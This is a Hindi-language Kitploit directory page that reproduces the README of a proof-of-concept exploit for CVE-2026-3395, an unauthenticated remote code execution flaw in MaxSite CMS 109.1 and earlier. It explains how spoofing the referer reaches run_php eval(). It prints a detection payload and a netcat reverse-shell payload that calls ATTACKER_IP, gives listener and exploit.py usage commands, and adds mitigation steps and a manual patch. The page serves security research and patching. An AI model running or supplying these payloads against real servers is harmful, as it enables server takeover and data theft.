Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — MaxSite CMS <= 109.1 में MarkItUp एडिटर AJAX एंडपॉइंट्स के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें डिटेक्शन और रिवर्स शेल पेलोड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

MaxSite CMS <= 109.1 में MarkItUp एडिटर AJAX एंडपॉइंट्स के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें डिटेक्शन और रिवर्स शेल पेलोड शामिल हैं।

रिपॉजिटरी देखें
55 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE‑2026‑3395 — MaxSite CMS में बिना प्रमाणीकरण के रिमोट कोड निष्पादन

Author Country Instagram GitHub CVE Exploit Type CVSS

अवलोकन

MaxSite CMS ≤ 109.1 में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता।

यह दोष MarkItUp एडिटर प्लगइन के AJAX एंडपॉइंट्स में कमज़ोर प्राधिकरण जाँचों के साथ-साथ run_php प्लगइन द्वारा उपयोगकर्ता-आपूर्ति PHP कोड के असुरक्षित निष्पादन से उत्पन्न होता है।

  • खोजा गया / ठीक किया गया: मार्च 2026
  • पैच किया गया: MaxSite CMS 109.2 में
  • विक्रेता: MaxSite CMS
  • रिपॉजिटरी: maxsite/cms

विवरण

यह भेद्यता MarkItUp एडिटर प्लगइन में निम्नलिखित फ़ाइलों को प्रभावित करती है:

  • preview-ajax.php
  • autosave-post-ajax.php

ये एंडपॉइंट्स:

  • बिना प्रमाणीकरण के पहुँच योग्य हैं
  • केवल कमज़ोर रेफरर सत्यापन करते हैं (आसानी से बायपास किया जा सकता है)
  • उपयोगकर्ता इनपुट को run_php प्लगइन में पास करते हैं
  • eval() का उपयोग करके [php]...[/php] शॉर्टकोड निष्पादित करते हैं

एक हमलावर /ajax/ रूट पर एक क्राफ्टेड POST अनुरोध भेज सकता है जिसमें data पैरामीटर के माध्यम से Base64-एन्कोडेड आंतरिक पथ और दुर्भावनापूर्ण PHP पेलोड शामिल होता है, जिसके परिणामस्वरूप:

🚨 पूर्ण बिना प्रमाणीकरण के रिमोट कोड निष्पादन


हमले का प्रवाह आरेख

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

पूर्वापेक्षाएँ

  • MaxSite CMS संस्करण ≤ 109.1
  • run_php प्लगइन सक्षम (सामान्य डिफ़ॉल्ट)
  • PHP कॉन्फ़िगरेशन eval() की अनुमति देता है

शोषण

एक Python 3 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (exploit.py) शामिल है।

डिटेक्शन पेलोड (गैर-विनाशकारी)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

रिवर्स शेल पेलोड

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

उपयोग

1. लिसनर शुरू करें

root@kitploit:~
nc -lvnp 9001

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

शमन

तत्काल कार्रवाई

  • MaxSite CMS 109.2 या उसके बाद में अपग्रेड करें
  • यदि आवश्यक न हो तो run_php प्लगइन अक्षम करें

मैनुअल पैच

भेद्य फ़ाइलों में प्रमाणीकरण जाँचें जोड़ें:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

संदर्भ

  • पैच कमिट https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • भेद्यता प्रविष्टि https://vuldb.com/?id.348281

  • NVD रिकॉर्ड https://nvd.nist.gov/vuln/detail/CVE-2026-3395


कानूनी नोटिस

यह प्रोजेक्ट निम्नलिखित के लिए प्रदान किया गया है:

  • सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य
  • अधिकृत पेनेट्रेशन टेस्टिंग

⚠️ स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

लेखक दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।


लेखक

Mohammed Idrees Banyamer जॉर्डन 🇯🇴 सुरक्षा शोधकर्ता

banyamer_security — Silent Hunter • Shadow Presence

मार्च 2026

टूल डाउनलोड करें